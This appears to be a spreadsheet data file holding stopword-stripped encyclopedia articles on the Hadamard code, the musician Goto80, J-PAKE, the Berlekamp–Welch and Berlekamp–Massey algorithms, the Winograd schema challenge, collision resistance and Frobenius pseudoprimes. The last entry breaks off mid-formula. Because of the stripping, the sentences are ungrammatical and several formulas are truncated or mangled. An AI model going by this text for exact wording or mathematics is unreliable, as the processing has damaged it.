hadamard code {\displaystyle n=2^{k-1}} chosen hadamard matrix sylvester type, gives rise message length {\displaystyle \log _{2}(2n)=k} distance distance code minimum hamming distance distinct codewords, i.e., minimum number positions distinct codewords differ. since walsh–hadamard code linear code, distance equal minimum hamming weight among non-zero codewords. non-zero codewords walsh–hadamard code hamming weight exactly {\displaystyle 2^{k-1}} following argument. {\displaystyle x\in \{0,1\}^{k}} non-zero message. then following value exactly equal fraction positions codeword equal one: {\displaystyle _{y\in \{0,1\}^{k}}{\big [}({\text{had}}(x))_{y}=1{\big ]}=\pr _{y\in \{0,1\}^{k}}{\big [}\langle x,y\rangle =1{\big ]}\,.} fact latter value exactly {\displaystyle 1/2} called random subsum principle. true, assume without loss generality {\displaystyle x_{1}=1} then, conditioned values {\displaystyle y_{2},\dots ,y_{k}} event equivalent {\displaystyle y_{1}\cdot x_{1}=b} {\displaystyle b\in \{0,1\}} depending {\displaystyle x_{2},\dots ,x_{k}} {\displaystyle y_{2},\dots ,y_{k}} probability {\displaystyle y_{1}=b} happens exactly {\displaystyle 1/2} thus, fact, non-zero codewords hadamard code relative hamming weight {\displaystyle 1/2} thus, relative distance {\displaystyle 1/2} relative distance augmented hadamard code {\displaystyle 1/2} well, longer property every non-zero codeword weight exactly {\displaystyle 1/2} since {\displaystyle vector {\displaystyle 1^{2^{k-1}}} codeword augmented hadamard code. this vector {\displaystyle x=10^{k-1}} encodes phad {\displaystyle {\text{phad}}(10^{k-1})=1^{2^{k-1}}} furthermore, whenever {\displaystyle non-zero vector {\displaystyle 10^{k-1}} random subsum principle applies again, relative weight {\displaystyle {\text{had}}(x)} exactly {\displaystyle 1/2} local decodability locally decodable code code allows single original message recovered high probability looking small portion received word. code {\displaystyle -query locally decodable message bit, {\displaystyle x_{i}} recovered checking {\displaystyle bits received word. more formally, code, {\displaystyle c:\{0,1\}^{k}\rightarrow \{0,1\}^{n}} {\displaystyle (q,\delta \geq 0,\epsilon \geq -locally decodable, exists probabilistic decoder, {\displaystyle d:\{0,1\}^{n}\rightarrow \{0,1\}^{k}} (note: {\displaystyle \delta (x,y)} represents hamming distance vectors {\displaystyle {\displaystyle {\displaystyle \forall x\in \{0,1\}^{k},\forall y\in \{0,1\}^{n}} {\displaystyle \delta (y,c(x))\leq \delta implies {\displaystyle pr[d(y)_{i}=x_{i}]\geq {\frac {1}{2}}+\epsilon ,\forall i\in [k]} theorem walsh–hadamard code {\displaystyle (2,\delta ,{\frac {1}{2}}-2\delta -locally decodable {\displaystyle 0\leq \delta \leq {\frac {1}{4}}} lemma codewords, {\displaystyle walsh–hadamard code, {\displaystyle {\displaystyle c_{i}+c_{j}=c_{i+j}} {\displaystyle c_{i},c_{j}} represent bits {\displaystyle positions {\displaystyle {\displaystyle respectively, {\displaystyle c_{i+j}} represents position {\displaystyle (i+j)} proof lemma {\displaystyle c(x)=c=(c_{0},\dots ,c_{2^{n}-1})} codeword {\displaystyle corresponding message {\displaystyle {\displaystyle g={\begin{pmatrix}\uparrow &amp;\uparrow &amp;&amp;\uparrow \\g_{0}&amp;g_{1}&amp;\dots &amp;g_{2^{n}-1}\\\downarrow &amp;\downarrow &amp;&amp;\downarrow \end{pmatrix}}} generator matrix {\displaystyle definition, {\displaystyle c_{i}=x\cdot g_{i}} from this, {\displaystyle c_{i}+c_{j}=x\cdot g_{i}+x\cdot g_{j}=x\cdot (g_{i}+g_{j})} construction {\displaystyle {\displaystyle g_{i}+g_{j}=g_{i+j}} therefore, substitution, {\displaystyle c_{i}+c_{j}=x\cdot g_{i+j}=c_{i+j}} proof theorem prove theorem construct decoding algorithm prove correctness. algorithm input: received word {\displaystyle y=(y_{0},\dots ,y_{2^{n}-1})} {\displaystyle i\in \{1,\dots ,n\}} pick {\displaystyle j\in \{0,\dots ,2^{n}-1\}} uniformly random. pick {\displaystyle k\in \{0,\dots ,2^{n}-1\}} {\displaystyle j+k=e_{i}} {\displaystyle e_{i}} {\displaystyle standard basis vector {\displaystyle j+k} bitwise {\displaystyle {\displaystyle {\displaystyle x_{i}\gets y_{j}+y_{k}} .output: message {\displaystyle x=(x_{1},\dots ,x_{n})} proof correctness message, {\displaystyle received word {\displaystyle {\displaystyle differs {\displaystyle c=c(x)} {\displaystyle \delta fraction bits, {\displaystyle x_{i}} decoded probability least {\displaystyle {\frac {1}{2}}+({\frac {1}{2}}-2\delta lemma {\displaystyle c_{j}+c_{k}=c_{j+k}=x\cdot g_{j+k}=x\cdot e_{i}=x_{i}} since {\displaystyle {\displaystyle picked uniformly, probability {\displaystyle y_{j}\not =c_{j}} {\displaystyle \delta similarly, probability {\displaystyle y_{k}\not =c_{k}} {\displaystyle \delta union bound, probability either {\displaystyle y_{j}} {\displaystyle y_{k}} match corresponding bits {\displaystyle {\displaystyle 2\delta {\displaystyle y_{j}} {\displaystyle y_{k}} correspond {\displaystyle lemma apply, therefore, proper value {\displaystyle x_{i}} computed. therefore, probability {\displaystyle x_{i}} decoded properly least {\displaystyle 1-2\delta therefore, {\displaystyle \epsilon ={\frac {1}{2}}-2\delta {\displaystyle \epsilon positive, {\displaystyle 0\leq \delta \leq {\frac {1}{4}}} therefore, walsh–hadamard code {\displaystyle (2,\delta ,{\frac {1}{2}}-2\delta locally decodable {\displaystyle 0\leq \delta \leq {\frac {1}{4}}} optimality linear hadamard codes proven optimal sense minimum distance. also zadoff–chu sequence improve walsh–hadamard codes references further reading rudra, atri. "hamming code hamming bound" (pdf). lecture notes. rudolph, dietmar; rudolph, matthias (2011-04-12). "46.4. hadamard– oder walsh–codes". modulationsverfahren (pdf) german). cottbus, germany: brandenburg university technology (btu). 214. archived (pdf) original 2021-06-16. retrieved 2021-06-14. (xiv+225 pages)</t>
  </si>
  <si>
    <t>Goto80</t>
  </si>
  <si>
    <t>goto80 (born anders carlsson, february 1981) swedish music artist researcher. described players glitch chipmusic, well active demoscener. turn millennium first bring chipmusic wider audience, also early adopter live game music. extensive back catalogue free music often open source wide span musical influences. currently focuses research art, maintains number blogs labels chipflip text-mode tumblr. career music goto80 released first music demoscene 1993, founded group hack trade released music free demos bbss. style seems predominantly rave electronica. first live performances group 1998.the first formal goto80-release cassette mono festival 2000. following year made first gameboy live performances lsdj together role model. papaya released year, combining pop, dub, vocoders calypso. this media attention, opening hultsfred festival. also working regularly famous demoscene groups like fairlight triad. 2002, co-founded band superdöner play form 8-bit punk rock. following year moved melbourne began incorporate modern tools renoise music making. goto80 released debut album commodore grooves 2005. year selected artist year microdisko chipmusic awards, later three nominees all-time c64-composer commodore's official 25-year celebration.in 2007, goto80 made release every month performed week. following year tried release song every together brännvall internet2008.se. this established 8-bit acts. next release, breakfast (2009) listed top-10 chip songs time. following poppy song, started focus darker sounds, often improvised completely commodore review described music microscopic bursts stutters atonal sound eventually lays beautiful descending bass tones.among aliases, extraboy seems productive one. extraboy appeared record first time 2002 remix koch. other aliases include johnny location, tomas delin, gotoet, susanne, gordon strombola, man, crystal master. appeared groups synth (1995), ebm-band damitu kuerpo (1997), punk group superdöner (2002), goto88 sunshine band (2007), electro kommando knorr (2009). research goto80 called demoscene historian. main research topics chipmusic, textmode graphics, demoscene. published first text book from music 2008, described chipmusic medium form. carlsson received master media communication 2010 thesis power users retro puppets critical study methods motivations chipmusic.other published texts include history demoscene music rhizome.org future potentials ascii together bill miller. works often focused live performances (2sleep1, gotozilla, punk potemkin, data jam) computer violence gold, polybius, 44422435 nowhere). worked together artists raquel meyers, jossystem, otro, videogramo, entter, rosa menkman, shojono tomo, jacob remin. since 2011, focusing textmode aesthetics together raquel meyers. 2012, claimed first make performance using petscii-based graphics music software. music distribution following practices demoscene, goto80 releases music free. 2007, 1000 songs online. year, left myspace later criticized fellow musicians trying present many internet platforms, advising distribution channels instead. vaguely connected hacking piracy, performed pirate parties like spectrial several hackerspaces. early c64-songs distributed executable files recordings, sounded different every time looped. netlabel context, made bitrate releases copyslave (2004) also mixed music together megamix monkeywarning (2002). more recently, open funk sores (2007) audiovisual open source release psp. cherry (2011) released envelope distributed form mail art. acid burger (2011) mini-dvd inside cheese burger. 2sleep1 (2011) collection audiovisual performances textmode, available streaming video. releases made together raquel meyers. discography studio albums 2005: commodore grooves 2007: digi-dig 2007: made internet 2007: bortabra 2008: music 2008: open funk sores 2011: cherry 2013: cйbзя tсaя 2014: files space 2015: ＿|￣|○ 2016: 80864 2019: shirbum 2020: 808642 2021: 2021: 2021: hardcore family 2021: compilations 2016: 0407 2001: papaya 2002: monkeywarning 2002: bushrunner 2002: philemon arthur 2004: copyslave 2005: contech 2005: bravo 2007: zyndabox 2007: updown 2007: ximplef 2007: barryland 2007: pulse 2007: 2007: unlimited edition 2007: _2_4x4 (with entter) 2007: little tittle 2009: breakfast 2012: acid burger (menu (with raquel meyers) 2011: summer seven 2012: virtual (with warren myles) 2012: ferret show (with schenk band) 2013: come together warm leatherette remixes goto80 contributed several famous remix compilations 8bits christmas (2003) wanna handheld (2009). 1990s, goto80 many tongue-in-cheek remixes based 1980s culture. this heard mono festival papaya covered music yazoo, kikki danielsson, incredible hulk, megaman, depeche mode, barbapapa, etcetera. 2002 released italo megamix c64, remixes miko mission, scotch, laserdance others. 2007, made c64-version deep throat together role model. full movie converted chunky pixel graphics, streamed datasette realtime. also remixed contemporary artists, monster zoku onsomb, icarus, koch, psilodump, damn! best fwends. references external links official website chipflip.org</t>
  </si>
  <si>
    <t>Password Authenticated Key Exchange by Juggling</t>
  </si>
  <si>
    <t>password authenticated exchange juggling j-pake) password-authenticated agreement protocol, proposed feng peter ryan. this protocol allows parties establish private authenticated communication solely based shared (low-entropy) password without requiring public infrastructure. provides mutual authentication exchange, feature lacking diffie–hellman exchange protocol. description parties, alice bob, agree group {\displaystyle generator {\displaystyle prime order {\displaystyle discrete problem hard. typically schnorr group used. general, j-pake prime order group suitable public cryptography, including elliptic curve cryptography. {\displaystyle shared (low-entropy) secret, password hash password {\displaystyle s\neq protocol executes rounds. round alice selects {\displaystyle x_{1}\in _{r}[0,q-1]} {\displaystyle x_{2}\in _{r}[1,q-1]} sends {\displaystyle g^{x_{1}}} {\displaystyle g^{x_{2}}} together zero-knowledge proofs (using example schnorr non-interactive zero-knowledge proof specified 8235) proof exponents {\displaystyle x_{1}} {\displaystyle x_{2}} similarly, selects {\displaystyle x_{3}\in _{r}[0,q-1]} {\displaystyle x_{4}\in _{r}[1,q-1]} sends {\displaystyle g^{x_{3}}} {\displaystyle g^{x_{4}}} together zero-knowledge proofs proof exponents {\displaystyle x_{3}} {\displaystyle x_{4}} communication completed round neither party depends other. when finishes, alice verify received zero-knowledge proofs also check {\displaystyle g^{x_{2}},g^{x_{4}}\neq .round alice sends {\displaystyle a=g^{(x_{1}+x_{3}+x_{4})x_{2}s}} zero-knowledge proof proof exponent {\displaystyle x_{2}s} (note alice actually derives public using {\displaystyle g^{x_{1}+x_{3}+x_{4}}} generator). similarly, sends {\displaystyle b=g^{(x_{1}+x_{2}+x_{3})x_{4}s}} zero-knowledge proof proof exponent {\displaystyle x_{4}s} .after round alice computes {\displaystyle k=(b/g^{x_{2}x_{4}s})^{x_{2}}=g^{(x_{1}+x_{3})x_{2}x_{4}s}} similarly, computes {\displaystyle k=(a/g^{x_{2}x_{4}s})^{x_{4}}=g^{(x_{1}+x_{3})x_{2}x_{4}s}} with keying material {\displaystyle alice derive session using cryptographic hash function: {\displaystyle \kappa =h(k)} two-round j-pake protocol completely symmetric. this helps significantly simplify security analysis. example, proof party leak password information data exchange must hold true party based symmetry. this reduces number needed security proofs half. practice, likely implement j-pake three flows since party shall normally take initiative. this done trivially without loss security. suppose alice initiates communication sending bob: {\displaystyle g^{x_{1}},g^{x_{2}}} zero-knowledge proofs. then replies with: {\displaystyle g^{x_{3}},g^{x_{4}},b=g^{(x_{1}+x_{2}+x_{3})x_{4}s}} zero-knowledge proofs. finally, alice sends bob: {\displaystyle a=g^{(x_{1}+x_{3}+x_{4})x_{2}s}} zero-knowledge proof. both parties derive session key. depending application requirement, alice perform optional confirmation step. there several ways simple method described speke works follows: alice sends {\displaystyle h(h(\kappa replies {\displaystyle h(\kappa alternatively, alice realize explicit confirmation using newly constructed session encrypt known value random challenge). eke, kerberos needham-schroeder attempt provide explicit confirmation exactly method. security properties given underlying schnorr non-interactive zero-knowledge proof secure, j-pake protocol proved satisfy following properties: off-line dictionary attack resistance leak password verification information passive/active attacker. forward secrecy produces session keys remain secure even password later disclosed. known-key security prevents disclosed session affecting security sessions. on-line dictionary attack resistance limits active attacker test password protocol execution.in 2015, abdalla, benhamouda mackenzie conducted independent formal analysis j-pake prove security random oracle model assuming algebraic adversaries. protocol design j-pake protocol designed combining random public keys structured achieve vanishing effect parties supplied exactly passwords. this somehow similar anonymous veto network protocol design. essence idea, however, traced back david chaum's original dining cryptographers network protocol, binary bits combined structured achieve vanishing effect. implementation j-pake implemented openssl openssh experimental authentication protocol. removed openssh source code january 2014. also implemented smoke crypto chat messenger, used firefox sync version discontinued uses different exchange storage method. mozilla's j-pake server shut along sync storage servers september 2015. pale moon continues j-pake part sync service. since february 2013, j-pake added lightweight bouncycastle (1.48 onwards). j-pake also used thread (network protocol) standardization j-pake included iso/iec 11770-4 (2017) international standard. also published 8236. references external links j-pake draft prototype demo j-pake prototype demo j-pake java example implementing j-pake using elliptic curve j-pake: from dining cryptographers jugglers</t>
  </si>
  <si>
    <t>Berlekamp–Welch algorithm</t>
  </si>
  <si>
    <t>berlekamp–welch algorithm, also known welch–berlekamp algorithm, named elwyn berlekamp lloyd welch. this decoder algorithm efficiently corrects errors reed–solomon codes rs(n, code based reed solomon original view message {\displaystyle m_{1},\cdots ,m_{k}} used coefficients polynomial {\displaystyle f(a_{i})} used lagrange interpolation generate polynomial {\displaystyle f(a_{i})} degree inputs {\displaystyle a_{1},\cdots ,a_{k}} {\displaystyle f(a_{i})} applied {\displaystyle a_{k+1},\cdots ,a_{n}} create encoded codeword {\displaystyle c_{1},\cdots ,c_{n}} goal decoder recover original encoding polynomial {\displaystyle f(a_{i})} using known inputs {\displaystyle a_{1},\cdots ,a_{n}} received codeword {\displaystyle b_{1},\cdots ,b_{n}} possible errors. also computes error polynomial {\displaystyle e(a_{i})} {\displaystyle e(a_{i})=0} corresponding errors received codeword. equations defining number errors, equations {\displaystyle b_{i}e(a_{i})=e(a_{i})f(a_{i})} where e(ai) cases f(ai), e(ai) error cases f(ai) these equations can't solved directly, defining product f(): {\displaystyle q(a_{i})=e(a_{i})f(a_{i})} adding constraint significant coefficient e(ai) result lead equations solved linear algebra. {\displaystyle b_{i}e(a_{i})=q(a_{i})} {\displaystyle b_{i}e(a_{i})-q(a_{i})=0} {\displaystyle b_{i}(e_{0}+e_{1}a_{i}+e_{2}a_{i}^{2}+\cdots +e_{e}a_{i}^{e})-(q_{0}+q_{1}a_{i}+q_{2}a_{i}^{2}+\cdots +q_{q}a_{i}^{q})=0} since constrained equations become: {\displaystyle b_{i}(e_{0}+e_{1}a_{i}+e_{2}a_{i}^{2}+\cdots +e_{e-1}a_{i}^{e-1})-(q_{0}+q_{1}a_{i}+q_{2}a_{i}^{2}+\cdots +q_{q}a_{i}^{q})=-b_{i}a_{i}^{e}} resulting equations solved using linear algebra, time complexity o(n^3). algorithm begins assuming maximum number errors (n-k)/2 equations solved (due redundancy), reduced process repeated, equations solved reduced indicating errors. q()/e() remainder q()/e() code word values f(ai) calculated locations e(ai) recover original code word. remainder uncorrectable error detected. example consider rs(7,3) defined gf(7) input values: {0,1,2,3,4,5,6}. message systematically encoded {1,6,3}. using lagrange interpolation, f(ai) applying f(ai) results code word {1,6,3,6,1,2,2}. assume errors occur resulting received code word {1,5,3,6,3,2,2}. start solve linear equations: {\displaystyle {\begin{bmatrix}b_{1}&amp;b_{1}a_{1}&amp;-1&amp;-a_{1}&amp;-a_{1}^{2}&amp;-a_{1}^{3}&amp;-a_{1}^{4}\\b_{2}&amp;b_{2}a_{2}&amp;-1&amp;-a_{2}&amp;-a_{2}^{2}&amp;-a_{2}^{3}&amp;-a_{2}^{4}\\b_{3}&amp;b_{3}a_{3}&amp;-1&amp;-a_{3}&amp;-a_{3}^{2}&amp;-a_{3}^{3}&amp;-a_{3}^{4}\\b_{4}&amp;b_{4}a_{4}&amp;-1&amp;-a_{4}&amp;-a_{4}^{2}&amp;-a_{4}^{3}&amp;-a_{4}^{4}\\b_{5}&amp;b_{5}a_{5}&amp;-1&amp;-a_{5}&amp;-a_{5}^{2}&amp;-a_{5}^{3}&amp;-a_{5}^{4}\\b_{6}&amp;b_{6}a_{6}&amp;-1&amp;-a_{6}&amp;-a_{6}^{2}&amp;-a_{6}^{3}&amp;-a_{6}^{4}\\b_{7}&amp;b_{7}a_{7}&amp;-1&amp;-a_{7}&amp;-a_{7}^{2}&amp;-a_{7}^{3}&amp;-a_{7}^{4}\\\end{bmatrix}}{\begin{bmatrix}e_{0}\\e_{1}\\q0\\q1\\q2\\q3\\q4\\\end{bmatrix}}={\begin{bmatrix}-b_{1}a_{1}^{2}\\-b_{2}a_{2}^{2}\\-b_{3}a_{3}^{2}\\-b_{4}a_{4}^{2}\\-b_{5}a_{5}^{2}\\-b_{6}a_{6}^{2}\\-b_{7}a_{7}^{2}\\\end{bmatrix}}} {\displaystyle {\begin{bmatrix}1&amp;0&amp;6&amp;0&amp;0&amp;0&amp;0\\5&amp;5&amp;6&amp;6&amp;6&amp;6&amp;6\\3&amp;6&amp;6&amp;5&amp;3&amp;6&amp;5\\6&amp;4&amp;6&amp;4&amp;5&amp;1&amp;3\\3&amp;5&amp;6&amp;3&amp;5&amp;6&amp;3\\2&amp;3&amp;6&amp;2&amp;3&amp;1&amp;5\\2&amp;5&amp;6&amp;1&amp;6&amp;1&amp;6\\\end{bmatrix}}{\begin{bmatrix}e_{0}\\e_{1}\\q0\\q1\\q2\\q3\\q4\\\end{bmatrix}}={\begin{bmatrix}0\\2\\2\\2\\1\\6\\5\\\end{bmatrix}}} {\displaystyle {\begin{bmatrix}1&amp;0&amp;0&amp;0&amp;0&amp;0&amp;0\\0&amp;1&amp;0&amp;0&amp;0&amp;0&amp;0\\0&amp;0&amp;1&amp;0&amp;0&amp;0&amp;0\\0&amp;0&amp;0&amp;1&amp;0&amp;0&amp;0\\0&amp;0&amp;0&amp;0&amp;1&amp;0&amp;0\\0&amp;0&amp;0&amp;0&amp;0&amp;1&amp;0\\0&amp;0&amp;0&amp;0&amp;0&amp;0&amp;1\\\end{bmatrix}}{\begin{bmatrix}e_{0}\\e_{1}\\q0\\q1\\q2\\q3\\q4\\\end{bmatrix}}={\begin{bmatrix}4\\2\\4\\3\\3\\1\\3\\\end{bmatrix}}} starting bottom right matrix, constraint {\displaystyle q(a_{i})=3x^{4}+1x^{3}+3x^{2}+3x+4} {\displaystyle e(a_{i})=1x^{2}+2x+4} {\displaystyle f(a_{i})=q(a_{i})/e(a_{i})=3x^{2}+2x+1} remainder e(ai) calculate f(a2 f(a5 produce corrected code word {1,6,3,6,1,2,2}. also reed–solomon error correction external links lecture notes essential coding theory madhu sudan university buffalo lecture notes coding theory atri rudra algebraic codes lines, planes curves, engineering approach richard blahut welch berlekamp decoding reed–solomon codes welch 4,633,470, welch, lloyd berlekamp, elwyn "error correction algebraic block codes", published september 1983, issued december 1986 patent lloyd welch elewyn berlekamp</t>
  </si>
  <si>
    <t>Berlekamp–Massey algorithm</t>
  </si>
  <si>
    <t>berlekamp–massey algorithm algorithm find shortest linear-feedback shift register (lfsr) given binary output sequence. algorithm also find minimal polynomial linearly recurrent sequence arbitrary field. field requirement means berlekamp–massey algorithm requires non-zero elements multiplicative inverse. reeds sloane offer extension handle ring.elwyn berlekamp invented algorithm decoding bose–chaudhuri–hocquenghem (bch) codes. james massey recognized application linear feedback shift registers simplified algorithm. massey termed algorithm lfsr synthesis algorithm (berlekamp iterative algorithm), known berlekamp–massey algorithm. description algorithm berlekamp–massey algorithm alternative reed–solomon peterson decoder solving linear equations. summarized finding coefficients polynomial λ(x) positions input stream {\displaystyle s_{i+\nu }+\lambda _{1}s_{i+\nu -1}+\cdots +\lambda _{\nu -1}s_{i+1}+\lambda _{\nu }s_{i}=0.} code examples below, c(x) potential instance λ(x). error locator polynomial c(x) errors defined {\displaystyle c(x)=c_{l}x^{l}+c_{l-1}x^{l-1}+\cdots +c_{2}x^{2}+c_{1}x+1} reversed: {\displaystyle c(x)=1+c_{1}x+c_{2}x^{2}+\cdots +c_{l-1}x^{l-1}+c_{l}x^{l}.} goal algorithm determine minimal degree c(x) results syndromes {\displaystyle s_{n}+c_{1}s_{n-1}+\cdots +c_{l}s_{n-l}} equal {\displaystyle s_{n}+c_{1}s_{n-1}+\cdots +c_{l}s_{n-l}=0,\qquad l\leq n\leq n-1.} algorithm: c(x) initialized current number assumed errors, initialized zero. total number syndromes. used main iterator index syndromes n−1. b(x) copy last c(x) since updated initialized copy last discrepancy (explained below) since updated initialized number iterations since b(x), updated initialized each iteration algorithm calculates discrepancy iteration would {\displaystyle d\gets s_{k}+c_{1}s_{k-1}+\cdots +c_{l}s_{k-l}.} zero, algorithm assumes c(x) correct moment, increments continues. zero, algorithm adjusts c(x) recalculation would zero: {\displaystyle c(x)\gets c(x)-(d/b)x^{m}b(x).} term shifts b(x) follows syndromes corresponding previous update occurred iteration recalculated discrepancy would {\displaystyle d\gets s_{k}+c_{1}s_{k-1}+\cdots -(d/b)(s_{j}+b_{1}s_{j-1}+\cdots this would change recalculated discrepancy {\displaystyle d=d-(d/b)b=d-d=0.} algorithm also needs increase (number errors) needed. equals actual number errors, iteration process, discrepancies become zero becomes greater equal otherwise updated algorithm update b(x), increase reset formula limits number available syndromes used calculate discrepancies, also handles case increases code sample algorithm massey (1969, 124) arbitrary field: case binary gf(2) code, discrepancy zero steps, check added avoid calculating also reed–solomon error correction reeds–sloane algorithm, extension sequences integers nonlinear-feedback shift register (nlfsr) references external links "berlekamp-massey algorithm", encyclopedia mathematics, press, 2001 [1994] berlekamp–massey algorithm planetmath. weisstein, eric "berlekamp–massey algorithm". mathworld. gf(2) implementation mathematica german) applet berlekamp–massey algorithm online gf(2) berlekamp-massey calculator</t>
  </si>
  <si>
    <t>Winograd schema challenge</t>
  </si>
  <si>
    <t>winograd schema challenge (wsc) test machine intelligence proposed hector levesque, computer scientist university toronto. designed improvement turing test, multiple-choice test employs questions specific structure: instances called winograd schemas, named terry winograd, professor computer science stanford university.on surface, winograd schema questions simply require resolution anaphora: machine must identify antecedent ambiguous pronoun statement. this makes task natural language processing, levesque argues winograd schemas, task requires knowledge commonsense reasoning.nuance communications announced july 2014 would sponsor annual competition, prize $25,000 best system could match human performance. however, prize longer offered. background winograd schema challenge proposed spirit turing test. proposed alan turing 1950, turing test plays central role philosophy artificial intelligence. turing proposed that, instead debating whether machine think, science concerned demonstrating intelligent behavior, tested. exact nature test turing proposed come scrutiny, especially since chatbot named eugene goostman claimed pass 2014. major concerns turing test machine could easily pass test brute force and/or trickery, rather true intelligence.the winograd schema challenge proposed part ameliorate problems came light nature programs performed well test.turing's original proposal called imitation game, involves free-flowing, unrestricted conversations english human judges computer programs text-only channel (such teletype). general, machine passes test interrogators able tell difference human five-minute conversation. weaknesses turing test performance eugene goostman exhibited turing test's problems. levesque identifies several major issues, summarized follows: deception: machine forced construct false identity, part intelligence. conversation: interaction qualify "legitimate conversation"—jokes, clever asides, points order—without requiring intelligent reasoning. evaluation: humans make mistakes judges often would disagree results. winograd schemas factor special format questions, derived winograd schemas. questions form tailored require knowledge commonsense reasoning variety domains. they must also carefully written betray answers selectional restrictions statistical information words sentence. origin first cited example winograd schema (and reason name) terry winograd: choices "feared" "advocated" turn schema instances: schema challenge question "does pronoun 'they' refer city councilmen demonstrators?" switching instances schema changes answer. answer immediate human reader proves difficult emulate machines. levesque argues knowledge plays central role problems: answer schema understanding typical relationships behavior councilmen demonstrators. since original proposal winograd schema challenge, ernest davis, professor york university, compiled list winograd schemas various sources examples kinds questions appear winograd schema challenge. formal description winograd schema challenge question consists three parts: sentence brief discourse contains following: noun phrases semantic class (male, female, inanimate, group objects people), ambiguous pronoun refer either noun phrases, special word alternate word, special word replaced alternate word, natural resolution pronoun changes. question asking identity ambiguous pronoun, answer choices corresponding noun phrases question.a machine given problem standardized form includes answer choices, thus making binary decision problem. advantages winograd schema challenge following purported advantages: knowledge commonsense reasoning required solve them. winograd schemas varying difficulty designed, involving anything simple cause-and-effect relationships complex narratives events. they constructed test reasoning ability specific domains (e.g., social/psychological spatial reasoning). there need human judges. pitfalls difficulty winograd schema challenge development questions. they need carefully tailored ensure require commonsense reasoning solve. example, levesque gives following example so-called winograd schema "too easy": answer question determined basis selectional restrictions: situation, pills pregnant, women women cannot carcinogenic, pills can. thus answer could derived without reasoning, understanding sentences' meaning—all necessary data selectional restrictions pregnant carcinogenic. activity 2016 2018, nuance communications sponsored competition, offering grand prize $25,000 scorer (for comparison, humans correctly answer 92–96% questions). however, nobody came close winning prize 2016 2018 competition cancelled lack prospects; prize longer offered.the twelfth international symposium logical formalizations commonsense reasoning held march 23–25, 2015 aaai spring symposium series stanford university, special focus winograd schema challenge. organizing committee included leora morgenstern (leidos), theodore patkos (the foundation research technology hellas), robert sloan (university illinois chicago).the 2016 winograd schema challenge july 2016 ijcai-16. there four contestants. first round contest solve pdps—pronoun disambiguation problems, adapted literary sources, constructed pairs sentences. highest score achieved correct, quan university science technology, china. hence, rules challenge, prizes awarded, challenge proceed second round. organizing committee 2016 leora morgenstern, ernest davis, charles ortiz. 2017, neural association model designed commonsense knowledge acquisition achieved accuracy manually selected problems original winograd schema dataset. june 2018, score 63.7% accuracy achieved full dataset using ensemble recurrent neural network language models, marking first deep neural networks learn independent corpora acquire common sense knowledge. 2019 score 90.1%, achieved original winograd schema dataset fine-tuning bert language model appropriate wsc-like training data avoid learn commonsense reasoning. general language model gpt-3 achieved score 88.3% without specific fine-tuning 2020.a challenging, adversarial "winogrande" dataset 44,000 problems designed 2019. this dataset consists fill-in-the-blank style sentences opposed pronoun format previous datasets.a version winograd schema challenge part glue (general language understanding evaluation) benchmark collection challenges automated natural-language understanding. references external links website contest sponsored nuance communications</t>
  </si>
  <si>
    <t>Collision resistance</t>
  </si>
  <si>
    <t>cryptography, collision resistance property cryptographic hash functions: hash function collision-resistant hard find inputs hash output; inputs h(a) h(b).: pigeonhole principle means hash function inputs outputs necessarily collisions;: harder find, cryptographically secure hash function "birthday paradox" places upper bound collision resistance: hash function produces bits output, attacker computes 2n/2 {\displaystyle \scriptstyle {\sqrt {2^{n}}}} hash operations random input likely find matching outputs. easier method brute-force attack, typically considered flaw hash function.cryptographic hash functions usually designed collision resistant. however, many hash functions thought collision resistant later broken. sha-1 particular published techniques efficient brute force finding collisions. however, hash functions proof finding collisions least difficult hard mathematical problem (such integer factorization discrete logarithm). those functions called provably secure. definition family functions 1}m(k) 1}l(k)} generated algorithm family collision-resistant hash functions, |m(k)| |l(k)| i.e., compresses input string, every computed within polynomial time given probabilistic polynomial algorithm g(1n), (x1, a(k, s.t. hk(x1) hk(x2)] negl(n),where negl(·) denotes negligible function, security parameter. rationale collision resistance desirable several reasons. digital signature systems, party attests document publishing public signature hash document. possible produce documents hash, attacker could party attest one, claim party attested other. distributed content systems, parties compare cryptographic hashes files order make sure version. attacker could produce files hash could trick users believing version file fact not. also collision attack preimage attack nist hash function competition provably secure cryptographic hash function error detection correction references</t>
  </si>
  <si>
    <t>Frobenius pseudoprime</t>
  </si>
  <si>
    <t>number theory, frobenius pseudoprime pseudoprime, whose definition inspired quadratic frobenius test described grantham 1998 preprint published 2000. frobenius pseudoprimes defined respect polynomials degree least extensively studied case quadratic polynomials. frobenius pseudoprimes w.r.t. quadratic polynomials definition frobenius pseudoprimes respect monic quadratic polynomial {\displaystyle x^{2}-px+q} discriminant {\displaystyle d=p^{2}-4q} square, expressed terms lucas sequences {\displaystyle u_{n}(p,q)} {\displaystyle v_{n}(p,q)} follows. composite number frobenius {\displaystyle (p,q)} pseudoprime {\displaystyle (1)\qquad \gcd(n,2qd)=1,} {\displaystyle (2)\qquad u_{n-\delta }(p,q)\equiv 0{\pmod {n}},} {\displaystyle (3)\qquad v_{n-\delta }(p,q)\equiv 2q^{(1-\delta )/2}{\pmod {n}},} {\displaystyle \delta =\left({\tfrac {d}{n}}\right)} jacobi symbol. when condition satisfied, condition becomes equivalent {\displaystyle (3')\qquad v_{n}(p,q)\equiv p{\pmod {n}}.} therefore, frobenius {\displaystyle (p,q)} pseudoprime equivalently defined conditions (1-2) (3), conditions (1-2) (3′). since conditions hold primes satisfy simple condition (1), used probable prime test. condition fails, either greatest common divisor less case non-trivial factor composite, equals case different parameters multiples relations pseudoprimes every frobenius {\displaystyle (p,q)} pseudoprime also lucas pseudoprime parameters {\displaystyle (p,q)} since defined conditions (2); dickson pseudoprime parameters {\displaystyle (p,q)} since defined conditions (3'); fermat pseudoprime base {\displaystyle |q|} {\displaystyle |q|&gt;1} .converse neither statements true, making frobenius {\displaystyle (p,q)} pseudoprimes proper subset sets lucas pseudoprimes dickson pseudoprimes parameters {\displaystyle (p,q)} fermat pseudoprimes base {\displaystyle |q|} {\displaystyle |q|&gt;1} furthermore, follows parameters {\displaystyle (p,q)} composite number frobenius pseudoprime lucas dickson pseudoprime. words, every fixed pair parameters {\displaystyle (p,q)} frobenius pseudoprimes equals intersection sets lucas dickson pseudoprimes. while frobenius {\displaystyle (p,q)} pseudoprime lucas pseudoprime, necessarily strong lucas pseudoprime. example, 6721 first frobenius pseudoprime {\displaystyle (p,q)=(1,-1)} strong lucas pseudoprime. every frobenius pseudoprime {\displaystyle x^{3}-x-1} also restricted perrin pseudoprime. analogous statements hold cubic polynomials form {\displaystyle x^{3}-rx^{2}+sx-1} examples frobenius pseudoprimes respect fibonacci polynomial {\displaystyle 